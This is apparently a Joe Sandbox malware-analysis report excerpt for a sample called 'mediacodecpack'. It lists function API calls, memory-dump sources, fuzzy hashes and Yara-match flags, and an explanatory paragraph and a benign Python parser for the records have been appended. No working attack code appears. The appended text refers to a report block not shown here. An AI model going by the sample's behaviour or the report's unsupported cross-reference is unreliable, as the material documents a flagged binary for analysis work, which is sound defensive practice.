                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
                                                                                            • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                            • String ID:
                                                                                            • API String ID: 3556715608-0
                                                                                            • Opcode ID: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                            • Instruction ID: 37d7613b282c24208f37f95ee69ae3eaf9c0527d79975c213f2f38643f7f707f
                                                                                            • Opcode Fuzzy Hash: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                            • Instruction Fuzzy Hash: FEA14A71A2C215CBEB009F69CC843257FE7B7A7318F10816DD415AB2A0E7B9DC95EB11
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                                                            • API String ID: 0-780898
                                                                                            • Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                            • Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
                                                                                            • Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                            • Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
                                                                                            • API String ID: 0-2604012851
                                                                                            • Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                            • Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
                                                                                            • Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                            • Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
                                                                                            APIs
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6095F030
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6095F03E
                                                                                            • sqlite3_stricmp.SQLITE3 ref: 6095F0B3
                                                                                            • sqlite3_free.SQLITE3 ref: 6095F180
                                                                                              • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
                                                                                              • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
                                                                                            • sqlite3_free.SQLITE3 ref: 6095F1BD
                                                                                              • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                            • sqlite3_result_error_code.SQLITE3 ref: 6095F34E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
                                                                                            • String ID: |
                                                                                            • API String ID: 1576672187-2343686810
                                                                                            • Opcode ID: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                                            • Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
                                                                                            • Opcode Fuzzy Hash: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                                            • Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
                                                                                            APIs
                                                                                            • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                                                              • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                                                            • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                                                            • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                                                            • String ID: $)><$sqlite_master$sqlite_temp_master
                                                                                            • API String ID: 652164897-1572359634
                                                                                            • Opcode ID: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                                            • Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
                                                                                            • Opcode Fuzzy Hash: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                                            • Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
                                                                                            APIs
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091B06E
                                                                                            • sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
                                                                                            • sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
                                                                                            • sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                            • String ID:
                                                                                            • API String ID: 2352520524-0
                                                                                            • Opcode ID: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
                                                                                            • Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
                                                                                            • Opcode Fuzzy Hash: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
                                                                                            • Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
                                                                                            APIs
                                                                                              • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                              • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                              • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                            • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                                                              • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                            • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                                                              • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                              • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                              • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                            • sqlite3_exec.SQLITE3 ref: 6096A523
                                                                                            • sqlite3_exec.SQLITE3 ref: 6096A554
                                                                                            • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                                                            • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                            • String ID: optimize
                                                                                            • API String ID: 3659050757-3797040228
                                                                                            • Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                            • Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
                                                                                            • Opcode Fuzzy Hash: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                            • Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
                                                                                            APIs
                                                                                            • sqlite3_column_blob.SQLITE3 ref: 609654FB
                                                                                            • sqlite3_column_bytes.SQLITE3 ref: 60965510
                                                                                            • sqlite3_reset.SQLITE3 ref: 60965556
                                                                                            • sqlite3_reset.SQLITE3 ref: 609655B8
                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                            • sqlite3_malloc.SQLITE3 ref: 60965655
                                                                                            • sqlite3_free.SQLITE3 ref: 60965714
                                                                                            • sqlite3_free.SQLITE3 ref: 6096574B
                                                                                              • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                            • sqlite3_free.SQLITE3 ref: 609657AA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_reset$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 2722129401-0
                                                                                            • Opcode ID: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                                            • Instruction ID: e3a8cc565ee031670952cbbbf81914cbe75110044a29491daaf6513bdc913a85
                                                                                            • Opcode Fuzzy Hash: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                                            • Instruction Fuzzy Hash: BBD1D270E14219CFEB14CFA9C48469DBBF2BF68304F20856AD899AB346D774E845CF81
                                                                                            APIs
                                                                                            • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                                                              • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
                                                                                            • sqlite3_free.SQLITE3 ref: 609647C5
                                                                                              • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                                                            • sqlite3_free.SQLITE3 ref: 6096476B
                                                                                              • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                            • sqlite3_free.SQLITE3 ref: 6096477B
                                                                                            • sqlite3_free.SQLITE3 ref: 60964783
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                                                            • String ID:
                                                                                            • API String ID: 571598680-0
                                                                                            • Opcode ID: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                            • Instruction ID: 53ad94a03898eae12f4127695087571842428d6fdffc19c65fee49adcf86f1ae
                                                                                            • Opcode Fuzzy Hash: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                            • Instruction Fuzzy Hash: 5E91F674E14228CFEB14CFA9D890B9EBBB6BB99304F1085AAD849A7344D734DD81CF51
                                                                                            APIs
                                                                                            • OpenEventA.KERNEL32(00100002,00000000,00000000,96605425), ref: 02D506C0
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02D506D5
                                                                                            • ResetEvent.KERNEL32(00000000,96605425), ref: 02D506DF
                                                                                            • CloseHandle.KERNEL32(00000000,96605425), ref: 02D50714
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,96605425), ref: 02D5078A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02D5079F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEventHandle$CreateOpenReset
                                                                                            • String ID:
                                                                                            • API String ID: 1285874450-0
                                                                                            • Opcode ID: 3b2ddc5084d9072de7971054bbd232d5adbef04bafc5e13a41d0fb9c7d842ebe
                                                                                            • Instruction ID: b4f42de637b913f94f6cc4881c7eb54160e9af2cc0c468fc5cebd9f2e5828143
                                                                                            • Opcode Fuzzy Hash: 3b2ddc5084d9072de7971054bbd232d5adbef04bafc5e13a41d0fb9c7d842ebe
                                                                                            • Instruction Fuzzy Hash: F4414071D04368ABDF10CFA5C848BAEBBB8EF09715F544619E819AB380D7749D05CFA1
                                                                                            APIs
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02D420AC
                                                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02D420CD
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D420D8
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02D4213E
                                                                                            • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02D4217A
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02D42187
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D421A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                                            • String ID:
                                                                                            • API String ID: 1171374749-0
                                                                                            • Opcode ID: 1569a932770a95989d6349252e94cbc0b3f5f2dcc8c584f5085a5c4307f33b42
                                                                                            • Instruction ID: ca6cf3693f4cce48668cc5ed0d81c018fab03dcaa2eca2833e8f960908a77cd9
                                                                                            • Opcode Fuzzy Hash: 1569a932770a95989d6349252e94cbc0b3f5f2dcc8c584f5085a5c4307f33b42
                                                                                            • Instruction Fuzzy Hash: 53411671504701AFC321DF25D888A6BBBE9FBC8754F104A1EF89A82750DB30E945CFA2
                                                                                            APIs
                                                                                              • Part of subcall function 02D50EE0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02D5073E,?,?), ref: 02D50F0F
                                                                                              • Part of subcall function 02D50EE0: CloseHandle.KERNEL32(00000000,?,?,02D5073E,?,?), ref: 02D50F24
                                                                                              • Part of subcall function 02D50EE0: SetEvent.KERNEL32(00000000,02D5073E,?,?), ref: 02D50F37
                                                                                            • OpenEventA.KERNEL32(00100002,00000000,00000000,96605425), ref: 02D506C0
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02D506D5
                                                                                            • ResetEvent.KERNEL32(00000000,96605425), ref: 02D506DF
                                                                                            • CloseHandle.KERNEL32(00000000,96605425), ref: 02D50714
                                                                                            • __CxxThrowException@8.LIBCMT ref: 02D50745
                                                                                              • Part of subcall function 02D531CA: RaiseException.KERNEL32(?,?,02D4EB63,?,?,?,?,?,?,?,02D4EB63,?,02D6ECA8,?), ref: 02D5321F
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,96605425), ref: 02D5078A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02D5079F
                                                                                              • Part of subcall function 02D50C20: GetCurrentProcessId.KERNEL32(?), ref: 02D50C79
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,96605425), ref: 02D507AF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                                            • String ID:
                                                                                            • API String ID: 2227236058-0
                                                                                            • Opcode ID: 33ac56126d2db322ee67939d740b83aaa8701c720995212fafbc4ef6a2a4495c
                                                                                            • Instruction ID: 03678970799cb8e07253aed325d012890b7c73107176bfb2eb00f44e1c766c16
                                                                                            • Opcode Fuzzy Hash: 33ac56126d2db322ee67939d740b83aaa8701c720995212fafbc4ef6a2a4495c
                                                                                            • Instruction Fuzzy Hash: 45314F71D00369ABDF20DBA4DC44BADB7B9AF09316F144119EC19AB380E7B09D05CFA1
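The function records in this report all follow one fixed layout: an "APIs" list of direct calls plus "Part of subcall function" entries, an optional "Strings" list with xrefs, and the key/value lines under Memory Dump Source and Similarity. That regularity makes the records easy to mine across a whole report, for example to pull every function that pairs CreateEventA with WaitForSingleObject, or to decode the OpenEventA desired-access argument 00100002 seen above into SYNCHRONIZE | EVENT_MODIFY_STATE. The parser below is an added example and is not part of the Joe Sandbox report or of the analysed sample; the embedded SAMPLE_REPORT is a constructed excerpt of two records copied from this page (the named-event block above and the SQLite LIKE/GLOB block further down), and the helper names parse_blocks, api_sequence, find_blocks_calling and decode_event_access are my own. The access-bit values are the documented winnt.h constants.

```python
import re

# Line shapes in a Joe Sandbox function record: direct API calls and "Part of subcall
# function" entries under "APIs", string xrefs under "Strings", and "key: value" lines
# under Memory Dump Source / Similarity. Layout taken from the records on this page.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
STRING_RE = re.compile(r"^•\s*(?P<text>.*?),\s*xrefs:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
META_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")
META_HEADERS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}

# winnt.h access bits that can appear in OpenEventA's dwDesiredAccess argument.
EVENT_ACCESS_FLAGS = {
    0x00000002: "EVENT_MODIFY_STATE", 0x00010000: "DELETE", 0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC", 0x00080000: "WRITE_OWNER", 0x00100000: "SYNCHRONIZE",
}

def parse_blocks(text):
    """Split report text into function records; each "APIs" header starts a new one."""
    blocks, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs" or not blocks:  # new record (or text that starts mid-record)
            blocks.append({"apis": [], "subcalls": [], "strings": [], "meta": {}, "yara": False})
            section = "apis" if line == "APIs" else None
            if line == "APIs":
                continue
        cur = blocks[-1]
        if line == "Strings" or line in META_HEADERS:
            cur["yara"] |= line == "Yara matches"  # bare header means the function has Yara hits
            section = "strings" if line == "Strings" else "meta"
            continue
        m = API_RE.match(line) if section == "apis" else None
        if m:
            args = m.group("args")
            entry = {"api": m.group("api"), "module": m.group("module"), "ref": m.group("ref"),
                     "args": [a.strip() for a in args.split(",")] if args is not None else [],
                     "caller": m.group("caller")}  # caller is set only for subcall entries
            (cur["subcalls"] if entry["caller"] else cur["apis"]).append(entry)
            continue
        m = STRING_RE.match(line) if section == "strings" else None
        if m:
            cur["strings"].append((m.group("text"), m.group("ref")))
            continue
        m = META_RE.match(line)
        if m and section != "apis":
            cur["meta"][m.group("key").strip()] = m.group("value").strip()
    return blocks

def api_sequence(block):
    """Direct calls of one function, in the order the report lists them."""
    return [e["api"] for e in block["apis"]]

def find_blocks_calling(blocks, required):
    """Indices of records whose direct API set covers every name in `required`."""
    return [i for i, b in enumerate(blocks) if set(required) <= set(api_sequence(b))]

def decode_event_access(hex_arg):
    """Name the access bits in a desired-access argument such as 00100002."""
    value = int(hex_arg, 16)
    names = [n for bit, n in sorted(EVENT_ACCESS_FLAGS.items()) if value & bit]
    unknown = value & ~sum(EVENT_ACCESS_FLAGS)  # bits with no name in the table
    return names + ([f"0x{unknown:08X}"] if unknown else [])

# Constructed excerpt: two records copied from this report page, trimmed to the fields used here.
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 02D50EE0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02D5073E,?,?), ref: 02D50F0F
• OpenEventA.KERNEL32(00100002,00000000,00000000,96605425), ref: 02D506C0
• CloseHandle.KERNEL32(00000000), ref: 02D506D5
• ResetEvent.KERNEL32(00000000,96605425), ref: 02D506DF
• CloseHandle.KERNEL32(00000000,96605425), ref: 02D50714
• __CxxThrowException@8.LIBCMT ref: 02D50745
  • Part of subcall function 02D531CA: RaiseException.KERNEL32(?,?,02D4EB63,?,?,?,?,?,?,?,02D4EB63,?,02D6ECA8,?), ref: 02D5321F
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,96605425), ref: 02D5078A
• CloseHandle.KERNEL32(00000000), ref: 02D5079F
• WaitForSingleObject.KERNEL32(00000000,000000FF,96605425), ref: 02D507AF
Yara matches
Similarity
• API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
• API String ID: 2227236058-0
APIs
• sqlite3_value_text.SQLITE3 ref: 6091A240
• sqlite3_value_text.SQLITE3 ref: 6091A24E
• sqlite3_value_bytes.SQLITE3 ref: 6091A25A
• sqlite3_value_text.SQLITE3 ref: 6091A27C
Strings
• ESCAPE expression must be a single character, xrefs: 6091A293
• LIKE or GLOB pattern too complex, xrefs: 6091A267
Similarity
• API String ID: 4080917175-264706735
"""
```

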